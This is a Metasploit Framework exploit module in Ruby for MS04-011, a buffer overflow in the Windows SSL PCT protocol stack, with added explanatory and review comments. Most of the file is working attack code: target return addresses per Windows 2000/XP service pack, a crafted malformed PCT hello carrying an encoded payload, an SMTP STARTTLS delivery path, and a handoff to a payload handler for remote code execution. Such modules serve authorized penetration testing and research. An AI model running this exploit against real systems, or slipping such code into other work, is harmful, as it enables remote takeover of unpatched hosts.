GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/windows/ssl/ms04_011_pct.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
  Rank = AverageRanking

  include Msf::Exploit::Remote::Tcp

  # Module metadata for CVE-2003-0719 / MS04-011, a buffer overflow in the
  # Windows SSL PCT protocol stack. Each target carries a 'Ret' that is a
  # "jmp [reg + off]" gadget valid for exactly one service pack (see the
  # inline comments), so selecting the wrong target sends the wrong address
  # and, as the description warns, may crash the remote system instead of
  # failing cleanly. Patched or PCT-disabled hosts are not affected; the
  # exploit method below reports the PCT-disabled reply when it sees it.
  #
  # @param info [Hash] module info merged via update_info
  def initialize(info = {})
    super(update_info(info,
      'Name' => 'MS04-011 Microsoft Private Communications Transport Overflow',
      'Description' => %q{
        This module exploits a buffer overflow in the Microsoft
        Windows SSL PCT protocol stack. This code is based on Johnny
        Cyberpunk's THC release and has been tested against Windows
        2000 and Windows XP. To use this module, specify the remote
        port of any SSL service, or the port and protocol of an
        application that uses SSL. The only application protocol
        supported at this time is SMTP. You only have one chance to
        select the correct target, if you are attacking IIS, you may
        want to try one of the other exploits first (WebDAV). If
        WebDAV does not work, this more than likely means that this
        is either Windows 2000 SP4+ or Windows XP (IIS 5.0 vs IIS
        5.1). Using the wrong target may not result in an immediate
        crash of the remote system.
      },
      'Author' => [ 'hdm' ],
      'License' => MSF_LICENSE,
      'References' =>
        [
          [ 'CVE', '2003-0719'],
          [ 'OSVDB', '5250'],
          [ 'BID', '10116'],
          [ 'MSB', 'MS04-011'],

        ],
      # Framework flag: a successful session is expected to be high-privilege.
      'Privileged' => true,
      'DefaultOptions' =>
        {
          # Payload exits by terminating its thread rather than the process.
          'EXITFUNC' => 'thread',
        },
      'Payload' =>
        {
          # Up to 1800 bytes of encoded payload; no bytes are excluded from
          # the encoder's output; -3500 is handed to the payload as the stack
          # adjustment to apply before it runs.
          'Space' => 1800,
          'BadChars' => "",
          'StackAdjustment' => -3500,
        },
      'Platform' => 'win',
      # Each target is [name, { 'Platform', 'Ret' }]. The gadget each 'Ret'
      # points at is noted inline; the address differs per service pack.
      'Targets' =>
        [
          [
            'Windows 2000 SP4',
            {
              'Platform' => 'win',
              'Ret' => 0x67419ce8, # jmp [esp + 0x6c]
            },
          ],
          [
            'Windows 2000 SP3',
            {
              'Platform' => 'win',
              'Ret' => 0x67419e1d, # jmp [esp + 0x6c]
            },
          ],
          [
            'Windows 2000 SP2',
            {
              'Platform' => 'win',
              'Ret' => 0x6741a426, # jmp [esp + 0x6c]
            },
          ],
          [
            'Windows 2000 SP1',
            {
              'Platform' => 'win',
              'Ret' => 0x77e4f44d, # jmp [ebx + 0x14]
            },
          ],
          [
            'Windows 2000 SP0',
            {
              'Platform' => 'win',
              'Ret' => 0x7658a6cb, # jmp [ebx + 0x0e]
            },
          ],
          [
            'Windows XP SP0',
            {
              'Platform' => 'win',
              'Ret' => 0x0ffb7de9, # jmp [esp + 0x6c]
            },
          ],
          [
            'Windows XP SP1',
            {
              'Platform' => 'win',
              'Ret' => 0x0ffb832f, # jmp [esp + 0x6c]
            },
          ],
        ],
      'DisclosureDate' => '2004-04-13',
      # Index 0 = 'Windows 2000 SP4'.
      'DefaultTarget' => 0))

    # NOTE(review): PROTO is a free-form string. Only the exact value 'smtp'
    # is recognised in #exploit; anything else (including a typo) silently
    # takes the raw path. An enumerated option would reject bad input.
    register_options(
      [
        OptString.new('PROTO', [true, "The application protocol: raw or smtp", "raw"])
      ])
  end

  # Runs the exploit: connect, optionally walk an SMTP session up to STARTTLS
  # so the PCT hello is sent at the point the server expects TLS, then send
  # the malformed hello and hand off to the payload handler. Every network
  # failure is reported via print_error and ends the method with a plain
  # return; no exception escapes from the phases handled below.
  #
  # Defender note: a server that answers the hello with "\x00\x00\x01" has
  # PCT disabled, which is the mitigated state; the module prints that fact
  # but, as written, still falls through to handler/disconnect.
  def exploit
    # Connection-phase failures only; later phases handle Timeout/EOF.
    begin
      connect
    rescue Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused => e
      print_error("Cannot connect: #{e.message}")
      return
    end

    print_status("Trying target #{target.name} with proto #{datastore['PROTO']}...")

    # This is a heap ptr to the ssl request
    # ... and just happens to not die ...
    # Thanks to CORE and Halvar
    #
    # 80620101 => and byte ptr [esi+1], 0x2
    # bd00010001 => mov ebp, 0x1000100
    # 0016 => add [esi], dl
    # 8f8201000000 => pop [esi+1]
    # eb0f => jmp short 11 to shellcode
    #
    # Layout: fixed opcode prefix, the short jmp, 11 bytes of 'X' filler that
    # the jmp skips over, target.ret stored bitwise-inverted (XOR 0xffffffff)
    # as a little-endian 32-bit value ('V'), then the encoded payload.
    # NOTE(review): presumably the vulnerable code inverts the stored address
    # back before using it; the original comments do not say — confirm.

    buf = "\x80\x66\x01\x02\xbd\x00\x01\x00\x01\x00\x16\x8f\x86\x01\x00\x00\x00"+
      "\xeb\x0f" + 'XXXXXXXXXXX' +
      [target.ret ^ 0xffffffff].pack('V')+
      payload.encoded

    # Connect to a SMTP service, call STARTTLS
    if (datastore['PROTO'] == 'smtp')
      # The banner is consumed but never inspected.
      begin
        greeting = sock.get_once
      rescue ::EOFError => e
        print_error("Failed to receive data for the protocol greeting: #{e.message}")
        return
      end

      # HELO with a random 1..10 character alphanumeric name; the reply is
      # read to keep the dialog in step but is not checked (it is overwritten
      # by the STARTTLS reply below).
      begin
        sock.put('HELO ' + (rand_text_alphanumeric(rand(10)+1)) + "\r\n")
        resp = sock.get_once
      rescue ::Timeout::Error
        print_error("Timedout while sending HELO")
        return
      rescue ::EOFError => e
        print_error("Failed to receive a response for HELO: #{e.message}")
        return
      end

      begin
        sock.put("STARTTLS\r\n")
        resp = sock.get_once
      rescue ::Timeout::Error
        print_error("Timed out while sending STARTTLS")
        return
      rescue ::EOFError => e
        print_error("Failed to receive a response for STARTTLS: #{e.message}")
        return
      end

      # 220 is the SMTP "ready to start TLS" reply. Any other reply only
      # produces a warning; the hello is still sent.
      if (resp and resp !~ /^220/)
        print_warning("Warning: this server may not support STARTTLS")
      end
    end


    # Send the hello and read whatever the server answers with.
    begin
      sock.put(buf)
      resp = sock.get_once
    rescue ::Timeout::Error => e # NOTE(review): e is bound but unused here
      print_error("Timed out while sending the malicious data")
      return
    rescue ::EOFError => e
      print_error("Failed to receive a response after the malicious data: #{e.message}")
      return
    end

    # "\x00\x00\x01" is the reply from a host with PCT disabled (i.e. the
    # mitigated state). NOTE(review): this branch only reports; execution
    # continues to handler/disconnect rather than returning.
    if (resp == "\x00\x00\x01")
      print_status("The response indicates that the PCT protocol is disabled")
    end

    handler
    disconnect
  end
end